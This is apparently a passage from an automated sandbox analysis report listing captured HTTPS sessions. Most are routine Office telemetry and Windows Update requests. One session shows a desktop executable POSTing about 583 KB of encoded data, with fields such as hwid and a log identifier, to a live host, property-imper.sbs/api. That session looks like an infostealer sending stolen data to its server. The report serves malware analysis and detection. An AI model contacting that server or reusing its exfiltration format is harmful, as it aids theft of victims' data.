                                                                                                                                                                        2024-11-24 04:11:33 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        29192.168.2.74973413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:32 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:32 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                        x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041132Z-15b8b599d88m7pn7hC1TEB4axw00000003z00000000097fu
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        30192.168.2.74973213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:32 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:32 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                        x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041132Z-178bfbc474bscnbchC1NYCe7eg00000005k000000000bkrm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        31192.168.2.74973513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:32 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:33 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                        x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041133Z-178bfbc474bgvl54hC1NYCsfuw00000005g00000000039ug
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:33 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        32192.168.2.749736104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:33 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=91TYWE8U8QMVU7OQU
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 583478
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 2d 2d 39 31 54 59 57 45 38 55 38 51 4d 56 55 37 4f 51 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 41 46 45 44 38 41 38 43 46 38 42 41 44 34 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 39 31 54 59 57 45 38 55 38 51 4d 56 55 37 4f 51 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 31 54 59 57 45 38 55 38 51 4d 56 55 37 4f 51 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                        Data Ascii: --91TYWE8U8QMVU7OQUContent-Disposition: form-data; name="hwid"95AFED8A8CF8BAD4D7CBBD6DF28D3732--91TYWE8U8QMVU7OQUContent-Disposition: form-data; name="pid"1--91TYWE8U8QMVU7OQUContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 30 ad 10 f5 03 b0 6d 73 cd 38 87 ae c7 25 36 ce 39 91 db 2f 55 a3 16 50 c7 8f af 1f ce 82 37 0b 9d 0a c8 f0 2b f5 06 a0 a5 45 25 95 a2 35 23 16 3f 28 70 01 24 3f 8d 8a 89 4d 58 df f1 8f 5b ef de eb cc f9 1b bb 10 ba 80 68 d4 a7 5b 52 5b f8 f9 ce 2a e2 0a 47 65 49 26 44 4c 3f 66 56 e8 4f cd 6f 27 55 33 2b c5 58 c2 87 44 57 79 c1 20 a7 17 b6 d7 69 35 9f 5d d1 de d7 2e ec e8 5c 8e 01 67 53 c7 b2 d6 0f b1 6c d0 06 16 e1 c4 47 0a 37 aa be 3b 9c e4 a2 db 5c d9 53 6d 82 49 43 10 6d ba 5e ad da b2 04 39 a2 27 46 85 66 27 d4 17 a7 c5 e9 94 6f a4 6f 46 8d e9 ec 66 4c 4a b8 bc 52 d6 8a f2 81 3d 3d 10 f5 3b 26 19 18 b5 c1 9c c4 c4 d3 87 1b d9 74 fd f0 73 51 7f cd 1f 6f d3 86 d0 8b 3e 6f 4e 43 e5 4d 5e 71 90 0b 4a 84 4e 7b 86 a0 b1 88 dd 0f 7e 80 1d 51 65 5c f4 fb e2
                                                                                                                                                                        Data Ascii: 0ms8%69/UP7+E%5#?(p$?MX[h[R[*GeI&DL?fVOo'U3+XDWy i5].\gSlG7;\SmICm^9'Ff'ooFfLJR==;&tsQo>oNCM^qJN{~Qe\
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 29 72 3c 17 80 33 7a 25 49 30 22 46 8e 77 26 65 a0 d9 c7 98 e2 c6 8e cd a4 f9 da 93 5c 4f 65 d4 d4 7e 50 bd 9d 9e 75 7a 46 ba 63 02 d5 38 4c c0 ce 78 60 3f ca 5b 8d c0 85 42 e3 b8 b9 a8 1c b5 54 96 f1 6a 29 2b 90 62 07 46 da 31 d1 fe 62 07 6f 1b 12 d4 1c c2 09 36 d3 06 22 a6 9a 69 ac 4e b0 ba 2a 35 1c a8 10 15 d8 8b ce 5e 31 5f 6e 4e 81 5d b7 7f 0c 50 ce 7b da 87 1b 36 86 b1 b3 39 81 df 9f dc 62 b8 80 2d e6 31 1c e2 c8 f5 3a 3c 33 e8 02 b1 aa 8c 6e e7 9f 7a 57 66 7e 03 2b fd b2 03 01 09 6b e0 4c 5e 87 be 41 88 c9 94 78 02 42 17 0d f7 72 3b 4f 55 b3 b4 7e 54 8c 2b be f4 b2 a3 0f ef 07 45 dc 6b 39 d5 62 9c 70 db 42 ab 81 16 04 73 70 b0 83 1f 4b 64 49 98 95 5b ca f2 e9 9b 25 67 a7 3f 0f 62 cb e0 56 1b 16 d8 ae db 69 46 e0 52 14 81 d2 f2 8a 55 3e 36 b2 9d 06
                                                                                                                                                                        Data Ascii: )r<3z%I0"Fw&e\Oe~PuzFc8Lx`?[BTj)+bF1bo6"iN*5^1_nN]P{69b-1:<3nzWf~+kL^AxBr;OU~T+Ek9bpBspKdI[%g?bViFRU>6
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 9e b7 04 d2 51 bc ec c1 5e 0e 26 1c 0a 52 ed 36 e7 8f 3e 3f a7 d2 c6 9b 78 5a 7c 50 88 0a 6c 48 0d bc 8a 14 2b 70 38 0c 80 e7 df 75 71 96 7b 34 85 66 85 81 1a 77 ba 64 ff fa 51 50 2c 32 76 01 d0 52 ef 0f 91 8f 27 d2 34 dc e9 96 87 dd ea 00 25 a1 0c c8 41 94 8a 94 a9 f4 17 6a 2d cf f7 03 a3 a2 ec 93 01 00 3f ea 32 33 17 7f 0b 97 3c 45 09 8d a6 44 93 31 80 1f 19 8f 88 cb 06 d6 e3 5f 24 d9 33 b2 ca 24 11 2d 04 dd 2d d4 de 99 fc 40 58 0c c0 a6 f7 ad bd 14 4b d6 2a f4 9f fe 4c 67 0a 78 13 6a 82 98 07 5a af 9e 31 ce f3 9c bb f9 be 9c 1c c8 71 e1 83 23 61 17 21 d8 d5 55 08 09 44 d9 cb 69 a0 70 9c ee 60 8c a0 44 07 fa 6f 89 2c cc 0c 11 61 66 14 e3 f4 5d 71 25 f6 9f cb 4e c2 a6 7c ce 48 29 f5 4c f7 14 e5 13 54 43 5c 46 ee 05 39 e8 34 79 7e 56 2a fc 90 d6 82 6e fe
                                                                                                                                                                        Data Ascii: Q^&R6>?xZ|PlH+p8uq{4fwdQP,2vR'4%Aj-?23<ED1_$3$--@XK*LgxjZ1q#a!UDip`Do,af]q%N|H)LTC\F94y~V*n
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: d9 d8 14 92 89 69 61 fa 35 88 e8 ac 04 5f 8f 7a 84 22 ef c3 ad 91 34 ef 92 4b 78 0a fa 4b a8 79 41 1f fd d5 92 a6 e6 96 dc 33 91 1c 22 2e f3 e6 84 76 ab ae c8 d6 3e 04 e2 b3 69 97 9d 73 78 d6 41 9c dc df d9 81 cc 27 54 9e f1 c8 a6 b7 9a dd 31 4d be 79 51 f0 48 bf 70 33 63 bf 14 61 a1 e7 0d 79 f6 1a 61 d0 0a a2 c6 04 4a 2e 89 48 8f 0d ef 70 cf 4c 67 98 fb e4 2c 10 e6 80 ed 1e 7a df ae b9 7f 3d 96 8e ff 3c 8e af b8 eb 4e e4 45 cc 05 3f 0e 41 83 32 94 1e 43 b4 3b 7e b1 5b b9 c9 90 66 60 46 96 61 ed 62 d7 6b f7 2a ac 3d 0a a0 95 cb 48 bd 0f a0 b7 1c 81 75 2e 9b a7 28 65 a8 ba 1b 4d e6 df 6e 08 71 52 12 fa 72 ef fc c5 d9 ac 76 17 75 64 d6 60 92 06 31 e6 ae 76 8b cb e0 04 b0 b5 a3 36 04 f3 6f 15 23 53 bd 6a a3 c3 1e db 28 f9 4d a1 c5 ab c4 ac d3 c2 6e 70 8e 0f
                                                                                                                                                                        Data Ascii: ia5_z"4KxKyA3".v>isxA'T1MyQHp3cayaJ.HpLg,z=<NE?A2C;~[f`Fabk*=Hu.(eMnqRrvud`1v6o#Sj(Mnp
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 60 ef 52 67 b4 4b d7 5a d7 f3 34 7b c7 d8 b5 ea ed bb a5 01 eb 8f 26 98 7a 55 d8 61 56 a2 43 55 f6 aa a7 47 5c 58 79 98 99 ef c0 d3 b4 b6 cb eb 1e 4f 22 81 97 93 26 70 53 e6 06 5b f5 53 95 60 3e c2 3f 4e 18 1e 7a e6 59 23 f3 91 bb 39 dd f6 8f a5 a1 8c 03 c1 64 87 78 21 67 ce 18 03 69 a4 7e 29 3f 81 5b c8 33 f2 65 d5 bb ea 72 f9 06 1b e6 17 a6 79 db 43 a7 94 2d 12 b5 13 d4 74 64 13 0e 1b 8e 1c 7b 67 4e 63 55 6f 9f 2d fb 30 af 7d 71 1c 23 1d 69 62 45 c9 64 34 0f fe a4 d1 ff c1 c3 64 0d da 12 06 55 e8 c8 ff 6d a4 9d 91 e4 5b bb ee c1 fa 17 49 2b 0e 5f 28 14 04 13 46 94 0c 28 b3 a3 71 fd 1d d6 a8 4e 09 84 7c 7c ad ff e2 a7 0c 75 9b 8f 76 93 56 78 5a 59 45 11 3a 34 83 47 5c b2 20 52 aa de d6 c2 f1 7a 99 05 33 94 34 1a d9 1d ed d1 b1 ea ac 40 eb 44 4b df 05 76
                                                                                                                                                                        Data Ascii: `RgKZ4{&zUaVCUG\XyO"&pS[S`>?NzY#9dx!gi~)?[3eryC-td{gNcUo-0}q#ibEd4dUm[I+_(F(qN||uvVxZYE:4G\ Rz34@DKv
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 4b c0 dc dc 1c 60 9c be eb f0 5b bb f0 77 9b 11 1f 03 e6 c5 ab d7 73 ea 19 fc fd 6e 8f 5f 07 7c bd 9b a3 3b c6 7a 59 a7 1b 35 de 7b 5f 20 d2 ba 2b bd de d7 4f 32 b3 92 2b 2d 55 5f e5 1f 4d cc ae 39 81 8d 5f 95 c9 79 eb f5 dc ba 35 54 13 ed 7e 88 5b a4 c6 3c a8 c6 97 65 ad 81 da 68 ff 9d 53 f7 b4 12 ca c9 28 ed 87 cc eb cc 12 76 e5 2d b7 4a 3e 70 e9 b7 55 08 ad f9 a0 c5 1d 6b 62 db a7 6e e4 10 5b cb 05 b2 f7 9c 5c af 68 61 ab 53 64 33 d3 dd 11 fb 56 b2 e3 2c 07 82 b1 8b 13 a8 52 34 b1 53 c2 1c 48 df dd 86 83 dd 1b 0c d0 ed 86 a7 ad 64 44 bc 2a 68 5f c2 25 20 92 b4 38 25 70 86 ce fa 6c 0a eb 75 ea df d3 dc 4f 7e 03 79 85 66 19 bc 67 09 6d 24 4b 3a e1 f8 a8 5c cb 6f 04 73 5c cb 2d f6 84 fb a0 d8 6c 7f 59 f0 57 c0 cc e8 17 43 32 95 cd 34 45 18 48 9d b3 86 e1
                                                                                                                                                                        Data Ascii: K`[wsn_|;zY5{_ +O2+-U_M9_y5T~[<ehS(v-J>pUkbn[\haSd3V,R4SHdD*h_% 8%pluO~yfgm$K:\os\-lYWC24EH
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 74 c1 df 4e bd ec 05 5f c4 52 3d e6 fb 07 c3 0b b9 5d 84 b7 87 fd b8 9b 2a 0c 95 99 8e 71 27 55 54 82 8f 97 48 70 8e 22 6d 60 38 0f 62 63 6c b3 34 04 ae 5b 38 d8 2a 46 be 8a 9b ef 6c d3 65 6c ae ff 71 50 c4 9d 29 8e e6 d9 d7 33 f8 72 d6 24 ab 7e b5 78 6b 6e d9 4d 75 d1 9a c9 33 76 6f 93 42 79 68 71 af 72 a6 73 b1 5d 46 b4 9e 53 8a 97 b5 f3 7b 01 81 bc 6b a8 77 8c fa 56 89 62 6d ec 1b 9e bb 79 3a bc 77 b7 62 1f c3 32 75 e8 2c a2 53 36 01 f7 8c 7d d0 dc ec f9 69 ab 21 5c 33 60 aa d5 1c d0 bb 13 5f 47 69 15 6c 58 2f 36 9c 5f fb c6 74 b3 a4 45 1a 26 c2 fd df 44 31 7f 82 30 34 22 27 76 c7 f7 70 96 86 c4 53 20 c3 af f2 eb d8 d5 b7 b8 39 17 e7 39 0e 4f 47 ad af 10 6a 1e 16 3a f8 9e 35 0a ed ea e0 d8 f5 33 13 5e fa 24 7b 0f d5 2b 58 f7 05 25 6d 7e 5e 2c c2 08 6d
                                                                                                                                                                        Data Ascii: tN_R=]*q'UTHp"m`8bcl4[8*FlelqP)3r$~xknMu3voByhqrs]FS{kwVbmy:wb2u,S6}i!\3`_GilX/6_tE&D104"'vpS 99OGj:53^${+X%m~^,m
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 4c 2a 6b 32 11 6d dd b4 09 20 fc 31 01 6e 85 8f 48 85 b4 c7 03 6b 45 04 04 df f6 1c ab f3 dd 5a 9f 2c 1c 70 96 28 53 85 bc 91 29 06 b6 52 50 4b 07 95 b2 e8 d4 ba 95 5d 94 5c 04 79 98 95 fd ac 3e 24 60 bf 97 88 66 e5 dc a3 da cb d4 59 68 ba b0 bd e7 08 ca 4e a5 13 b3 43 bf cc 53 89 31 9b 20 da 1d 3e 4f c7 96 b9 c8 47 e7 7d 32 2b 96 68 30 a1 94 a2 ed 41 ae 0f e6 17 3b 4f 57 8b 4f 0c d4 49 e2 40 2e 2d 59 1b b6 fc ed de 30 a9 df 8a 92 19 49 6e 15 6a 10 eb ee c3 e7 63 94 25 88 84 09 b4 f8 c6 a2 9c 35 6d ed 97 bd 3d 31 f3 30 ae 5f ea f2 60 94 cb f7 0f 2e 19 bc e8 d4 e0 8a 66 ad 62 a6 4a 4b 87 2c 12 f2 04 b1 7e 01 ee 89 51 fb 0f e4 1f dd 35 b5 c0 fb 16 3a a8 0b 72 9d 60 1f 1c 7f 7c 17 93 97 4d 13 d0 ea 93 79 eb 87 be 56 42 f0 54 32 04 66 6c e6 37 f3 25 85 45 27
                                                                                                                                                                        Data Ascii: L*k2m 1nHkEZ,p(S)RPK]\y>$`fYhNCS1 >OG}2+h0A;OWOI@.-Y0Injc%5m=10_`.fbJK,~Q5:r`|MyVBT2fl7%E'
                                                                                                                                                                        2024-11-24 04:11:33 UTC15331OUTData Raw: 75 de 42 f4 68 ca 12 23 68 f5 38 63 7c 33 25 63 0f 9e ec c1 de f4 2a 5e 6b 5a 8e fe 8d db 58 4c 09 06 25 08 88 a3 58 d6 87 02 f3 3e 0c 15 06 68 ef 4e af fa 65 bb 3c 39 3f 31 5f c5 ae 8c be df 6a c4 b8 1e d2 97 f5 7e 89 1d b0 7a 3f 0d 1a d2 9a e6 39 59 23 45 a5 7a 8f 41 6c 0c b8 55 c2 d2 13 84 d8 cc a5 5f ff 6f f1 98 07 0c 38 06 dc 70 6e 0a b4 99 12 c5 9c e7 9b 85 db cc a2 e9 39 ab 47 81 55 d5 cc 6c e6 ea 77 f8 a1 30 10 ed ca f5 ab df 97 0b 21 03 24 4b 3e 02 aa 91 89 ec 68 ed 9c 74 01 42 66 f9 e0 a6 e2 c3 3d bc 23 02 2a ce 5c a7 be 6d 86 a9 6e 8a fa de 22 b7 70 a1 f1 8b 5a a5 c3 b3 c7 47 04 6c cf 36 f1 72 a6 ce 7d de 21 5a ff 6e 14 96 71 e2 02 0e 12 6d 2e f1 79 16 ff 24 3c ed 86 1c 10 a0 1b 3e 96 04 af 5f 0a 0d ef 25 34 04 f3 30 ce 68 20 f5 61 9a c7 ad 7c
                                                                                                                                                                        Data Ascii: uBh#h8c|3%c*^kZXL%X>hNe<9?1_j~z?9Y#EzAlU_o8pn9GUlw0!$K>htBf=#*\mn"pZGl6r}!Znqm.y$<>_%40h a|
                                                                                                                                                                        2024-11-24 04:11:37 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:37 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=9u0bh9hleqip36ijcs0m7jng6v; expires=Wed, 19-Mar-2025 21:58:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B4BHtxk0heV%2FghuqRoSMAcS%2B8IMYew6Rbyte6mrxYsBRpuzRuH7ouC8f1zN%2BYEBPo82RQYm45OWin9Bfyd8915fYeMSr0qcYUfNgytLQvJc9zl32qU9bfMYHCBAOeQJagD3co6w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768e412db542fe-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1807&sent=338&recv=605&lost=0&retrans=0&sent_bytes=2845&recv_bytes=586070&delivery_rate=1631284&cwnd=53&unsent_bytes=0&cid=d231b8fd2dea1009&ts=4040&x=0"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        33192.168.2.7497304.175.87.197443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:33 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=x+GKtrEwdR9nSl4&MD=2zgGtu86 HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                        2024-11-24 04:11:34 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Expires: -1
                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                        MS-CorrelationId: 459a2427-5c1e-4655-a8f0-2c6b5e4e23f1
                                                                                                                                                                        MS-RequestId: ccccf8dc-f967-4add-aedd-f8cd5794be13
